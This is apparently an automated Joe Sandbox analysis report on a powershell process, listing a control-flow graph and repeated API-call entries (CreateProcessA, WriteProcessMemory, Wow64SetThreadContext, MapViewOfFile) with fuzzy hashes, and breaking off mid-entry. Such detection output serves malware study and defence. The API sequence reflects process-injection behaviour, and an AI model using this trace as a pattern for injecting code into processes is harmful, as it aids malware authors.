                                                                                                                                                                                                                                                        control_flow_graph 2418 6c9e130-6c9e1a0 2420 6c9e1d9-6c9e1f9 2418->2420 2421 6c9e1a2-6c9e1ac 2418->2421 2428 6c9e1fb-6c9e205 2420->2428 2429 6c9e232-6c9e26c 2420->2429 2421->2420 2422 6c9e1ae-6c9e1b0 2421->2422 2423 6c9e1d3-6c9e1d6 2422->2423 2424 6c9e1b2-6c9e1bc 2422->2424 2423->2420 2426 6c9e1be 2424->2426 2427 6c9e1c0-6c9e1cf 2424->2427 2426->2427 2427->2427 2430 6c9e1d1 2427->2430 2428->2429 2431 6c9e207-6c9e209 2428->2431 2435 6c9e26e-6c9e278 2429->2435 2436 6c9e2a5-6c9e31a CreateProcessA 2429->2436 2430->2423 2433 6c9e20b-6c9e215 2431->2433 2434 6c9e22c-6c9e22f 2431->2434 2437 6c9e219-6c9e228 2433->2437 2438 6c9e217 2433->2438 2434->2429 2435->2436 2439 6c9e27a-6c9e27c 2435->2439 2448 6c9e31c-6c9e322 2436->2448 2449 6c9e323-6c9e36b 2436->2449 2437->2437 2440 6c9e22a 2437->2440 2438->2437 2441 6c9e29f-6c9e2a2 2439->2441 2442 6c9e27e-6c9e288 2439->2442 2440->2434 2441->2436 2444 6c9e28a 2442->2444 2445 6c9e28c-6c9e29b 2442->2445 2444->2445 2445->2445 2446 6c9e29d 2445->2446 2446->2441 2448->2449 2454 6c9e37b-6c9e37f 2449->2454 2455 6c9e36d-6c9e371 2449->2455 2457 6c9e38f-6c9e393 2454->2457 2458 6c9e381-6c9e385 2454->2458 2455->2454 2456 6c9e373 2455->2456 2456->2454 2459 6c9e3a3 2457->2459 2460 6c9e395-6c9e399 2457->2460 2458->2457 2461 6c9e387 2458->2461 2463 6c9e3a4 2459->2463 2460->2459 2462 6c9e39b 2460->2462 2461->2457 2462->2459 2463->2463
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06C9E30A
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateProcess
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                                                                                                                                        • Opcode ID: b217fb4b93da52324167db2adffe5da4410e5acc75a80f95bc066be9b010467d
                                                                                                                                                                                                                                                        • Instruction ID: 38682ef7cff9116eea40e790abf67107b493f69952998698a72439a54ba22628
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b217fb4b93da52324167db2adffe5da4410e5acc75a80f95bc066be9b010467d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1814371D006498FDF50CFA9C8897AEBBF2FF58310F14852AE855A7290DB749981CF91
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 06C90F9F
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFileMapping
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 524692379-0
                                                                                                                                                                                                                                                        • Opcode ID: 5b176bcaa3261b71d1c8645f1f1e1a09f8c486f03b28b5a772689c40d7a7b8f5
                                                                                                                                                                                                                                                        • Instruction ID: dcef69b9844f36dce7b842418dc4f9657c9db04ee2c8850c8b4b5f5ab737c236
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b176bcaa3261b71d1c8645f1f1e1a09f8c486f03b28b5a772689c40d7a7b8f5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03418571D002489FDF60DFA9D8857AEBBB1FF48314F14852EE819A7240D7749946CF94
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 06C90C39
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                        • Opcode ID: 3a61125390eb6a91d7e3c6bedb00ab258f734b91bc7d3a3e303f542309a58505
                                                                                                                                                                                                                                                        • Instruction ID: 3e07d897bca88f6c5280c4abdf83139be1cdcd548226407051e81130e39df56e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a61125390eb6a91d7e3c6bedb00ab258f734b91bc7d3a3e303f542309a58505
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B415571E00258DFDF60DFA9C885B9EBBB1FF48314F14842EE815A7240D7759885CBA1
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 06C90F9F
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFileMapping
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 524692379-0
                                                                                                                                                                                                                                                        • Opcode ID: 8a33062a98ff81282929abfaf0a36f35790f5727f396e844950d3ab92cee3d7a
                                                                                                                                                                                                                                                        • Instruction ID: 957644ad2b772084ab46ec8cb3d2fa980c8d697698940b4ad6f981f5c9f0b066
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a33062a98ff81282929abfaf0a36f35790f5727f396e844950d3ab92cee3d7a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F0417471D102489FDF50DFA9C889BAEBBB1FF48314F14852EE819A7240DB749985CFA4
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 06C90C39
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                        • Opcode ID: 019b9f3e597dc39dff52b2042151dd0ed741697ab13a253d792be87e33cfff5b
                                                                                                                                                                                                                                                        • Instruction ID: d5c06147f9386055d36f84674641e95ddf2fe8fe4f3f55e8c22078585ff76f62
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 019b9f3e597dc39dff52b2042151dd0ed741697ab13a253d792be87e33cfff5b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64413571E002589FDF50DFA9C889B9EBBB1FF48314F14852EE815A7250DB759481CFA1
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,00000001), ref: 006B2DF5
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57159800504.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6b0000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                                                                                                                                        • Opcode ID: d80034bbf9290b0068be3a4f730ab1946f2419c92af12b0f94573d4360bf9241
                                                                                                                                                                                                                                                        • Instruction ID: 6216abfbbb15091bb06cf8de18d97bab996290b149979052f52e71fd740a9c0f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d80034bbf9290b0068be3a4f730ab1946f2419c92af12b0f94573d4360bf9241
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A3189B19053899FDB11DFA9C884BDEBFF0FF49310F10846AE418A7251C334A944CBA5
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06C9F170
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                                                                                                                                        • Opcode ID: 46787fc41f711f56854b0b4da6b6f8e6454d3c5f0e8b18a2bdf0a473f26eb9d6
                                                                                                                                                                                                                                                        • Instruction ID: 7536b2c0be30620e3dd91e6613c956bc43105f9ff2520ba940bf0a38458e4907
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46787fc41f711f56854b0b4da6b6f8e6454d3c5f0e8b18a2bdf0a473f26eb9d6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 802126B29003499FDF10DFA9D884BEEBBF1EB48314F50842AE819A7240C7789945CBA4
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06C9F170
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                                                                                                                                        • Opcode ID: 90601c07136e7a79cadda0aa1bf5e2a120216f2799b92c83531b2bcc800c1596
                                                                                                                                                                                                                                                        • Instruction ID: 348e620e87aeec03818bdb1084439ec92915d2a004bcae2e24b4dae85b5608bf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 90601c07136e7a79cadda0aa1bf5e2a120216f2799b92c83531b2bcc800c1596
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 232117B2D003499FDF10DFA9C884BDEBBF5FB49314F50842AE919A7240D7789945CBA4
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,00000001), ref: 006B2DF5
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57159800504.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6b0000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                                                                                                                                        • Opcode ID: 6d90a0f7d4305ea8c809bbfb45262109648eefd2aa6c26fe97eb892c84ce60e2
                                                                                                                                                                                                                                                        • Instruction ID: 02a2f46cb96047ec04e27620abfa7a50872f07a1d94c129121ce7321f1ba4bc7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6d90a0f7d4305ea8c809bbfb45262109648eefd2aa6c26fe97eb892c84ce60e2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E421E0B59003499FDB14DF9AD885BDEBBF5FB48314F10842AE819A7350D374A944CBA4
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C9E8B6
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                                                                                                                                        • Opcode ID: 2991703ae8387f6161e130230e19f612ca0382d6dd246fed0760b5896596e5ac
                                                                                                                                                                                                                                                        • Instruction ID: 7044dec5d9f303ab29a7349e7b07f5f2beb3bd70d844bf9d93384f0803bf4dff
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2991703ae8387f6161e130230e19f612ca0382d6dd246fed0760b5896596e5ac
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F6213A72D003099FDB14DFAAC4857EEBBF4EF49214F54842ED419A7240D778A945CFA4
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C9E8B6
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                                                                                                                                        • Opcode ID: 7d6c7b2ee845a1e99f261e8ced9b6bdc561cf68dce0caddecd3e8f1c337f977b
                                                                                                                                                                                                                                                        • Instruction ID: 70a5a2af1a295acd69af25b07cfc73fe03f16bc0d1e037de68736af2e6651412
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d6c7b2ee845a1e99f261e8ced9b6bdc561cf68dce0caddecd3e8f1c337f977b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 38213572D003098FDB14DFAAC4847EEBBF4EF89224F54842ED419A7240D778A945CFA4
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • MapViewOfFile.KERNEL32(?,?,?,?,?), ref: 06C91296
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileView
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3314676101-0
                                                                                                                                                                                                                                                        • Opcode ID: 44b1e934597961d7fb76d4241c99b3e2d495ca1c713a29ffbae45b054896fbad
                                                                                                                                                                                                                                                        • Instruction ID: a7b8fb2096edde2a7db6bdba2a243361672904985f125391a6ea03faaef48c08
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44b1e934597961d7fb76d4241c99b3e2d495ca1c713a29ffbae45b054896fbad
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 381167768002099FDF10DFAAD845BEFBFF5EB88320F14881AE419A7200C734A940CBA0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • MapViewOfFile.KERNEL32(?,?,?,?,?), ref: 06C91296
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileView
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3314676101-0
                                                                                                                                                                                                                                                        • Opcode ID: 97a6710ded86a5e6a7283475500ef20e73d6204e36a1cf4ff0c3caa3214b8c2e
                                                                                                                                                                                                                                                        • Instruction ID: 5475ab837bf3e10c4b38e356db0462ece2bda8265aa895cda5fbc6fb673a24f7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 97a6710ded86a5e6a7283475500ef20e73d6204e36a1cf4ff0c3caa3214b8c2e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7112676C003499FDF10DFAAD845BEEBBF5EB89320F14881AE415A7250C775A944CBA4
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193151493.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c30000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: W
                                                                                                                                                                                                                                                        • API String ID: 0-655174618
                                                                                                                                                                                                                                                        • Opcode ID: a3a748f343d1262764a6dbac3a71fd4fdfb4ea7f194a95d9fbfdbcc0d60b2902
                                                                                                                                                                                                                                                        • Instruction ID: c3e63f88bf2d21123998675e9662407ab7d72039eb46196196ceaa941100f5ca
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3a748f343d1262764a6dbac3a71fd4fdfb4ea7f194a95d9fbfdbcc0d60b2902
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E61BE717003208FDB69EB34D868A6E77B2AF85301B1044ADDA069F3A5DE39AD06C795
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7310000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: D, i
                                                                                                                                                                                                                                                        • API String ID: 0-2777633452
                                                                                                                                                                                                                                                        • Opcode ID: f4cf3f3c19304841d5677835ea0e6d05e498e9ada57b1a0c311d162712c6002f
                                                                                                                                                                                                                                                        • Instruction ID: 68d42530aed557f864b01938049ea042c65cc52763590faead140c862a17c61b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f4cf3f3c19304841d5677835ea0e6d05e498e9ada57b1a0c311d162712c6002f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0411DB170930ACFF72D96659810AA7BBA7AFC5210B24826BE64DCB255DF72CC01C352
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7310000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: G,j
                                                                                                                                                                                                                                                        • API String ID: 0-3403446747
                                                                                                                                                                                                                                                        • Opcode ID: 128e4de73969187de7e9087c473ff7ba7cda2f4532e969a3e2f8b73b31b8ea8f
                                                                                                                                                                                                                                                        • Instruction ID: 235d8083858ead05eb39f1b3371b54b2d82b572b5f4b489a6192616fae4031c3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 128e4de73969187de7e9087c473ff7ba7cda2f4532e969a3e2f8b73b31b8ea8f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E313AF164A30A9FFB6C5A34886077A7BF6AF81200F458066D44DDB192DB38C9C1CB62
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7310000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: G,j
                                                                                                                                                                                                                                                        • API String ID: 0-3403446747
                                                                                                                                                                                                                                                        • Opcode ID: 7a4c6edde78245d802901ec4bb6e479d4f30ac982bdbf6736687a86feeeb9ec5
                                                                                                                                                                                                                                                        • Instruction ID: dc2e5d9e5c51a2b50395d5325aa15ce1b3454d875144671b20cca959f6db3d25
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a4c6edde78245d802901ec4bb6e479d4f30ac982bdbf6736687a86feeeb9ec5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02213AF1A05342CFEB69CF7894412A9BFE5BF82260F1881AEC40D8B242F635C845C7A1
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: !
                                                                                                                                                                                                                                                        • API String ID: 0-2657877971
                                                                                                                                                                                                                                                        • Opcode ID: 3251d4c287eb7293ce16c3082c00926535c9036aa2ba5ae5ffb21ea213dbd149
                                                                                                                                                                                                                                                        • Instruction ID: 78e8cd2650ec392d96d9fabac83a3a3bb08f751ceb8dff5ba5fb69c01b7dcd16
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3251d4c287eb7293ce16c3082c00926535c9036aa2ba5ae5ffb21ea213dbd149
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9811C570A41228CFEB60CF18C85AB99B7F1FB0A305F5080E9E509A7281C7B19E85CF81
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: !
                                                                                                                                                                                                                                                        • API String ID: 0-2657877971
                                                                                                                                                                                                                                                        • Opcode ID: a1fa611da55273372ee8e7e0fad950c9aa3d4905a2807425766fea7b0b2c25cd
                                                                                                                                                                                                                                                        • Instruction ID: 576604d0182ec81f7f64331d69a85c7b1db330ebc57671e50a4d0572ca8c7715
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a1fa611da55273372ee8e7e0fad950c9aa3d4905a2807425766fea7b0b2c25cd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C011A74A45218DFEB61CF19CC4ABD8BBB1FB09301F1480E9E409AB681C7B19E85CF81
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57162315970.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_e00000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3cf6a10cdc10af97afea4febec1540666e0ad51e34c93f827e165c37a6c04aaa
                                                                                                                                                                                                                                                        • Instruction ID: 848497de5919c7998e85d78a2b1698761d321cd158925e3678c2c05191f4009e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3cf6a10cdc10af97afea4febec1540666e0ad51e34c93f827e165c37a6c04aaa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60F12A74A05249DFDB05CFA8D484AADBBF1FF89310F248169E845AB362C731ED81CB91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57162315970.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_e00000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d98d291c5ce420ed576c1ad604788f3d07eea66dbb83da31209da9f404b75b16
                                                                                                                                                                                                                                                        • Instruction ID: cabff1f35bbc22c2963ac26b9cfe91ed75fd8836de9e18e296bb361554291b86
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d98d291c5ce420ed576c1ad604788f3d07eea66dbb83da31209da9f404b75b16
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 36D13934A052489FDB15CFA8D484A9DFBF2EF49314F248299E855AB3A1C731ED81CB94
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57201193288.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_82e0000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ed1f92e1d3ee772a9c0171b1afe42ebb03da2fdd3958e5bac2ec8d24df4f5a83
                                                                                                                                                                                                                                                        • Instruction ID: 18744e0e4a9e2453891d4d4b0799c518a7c1fffc46e8dff39952c0181b7d02fe
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ed1f92e1d3ee772a9c0171b1afe42ebb03da2fdd3958e5bac2ec8d24df4f5a83
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5C1E674E24229CFEB68DF24C958BD9BBB2BB49305F5082DAE50DA6250DB701AC5CF05
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57201193288.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_82e0000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
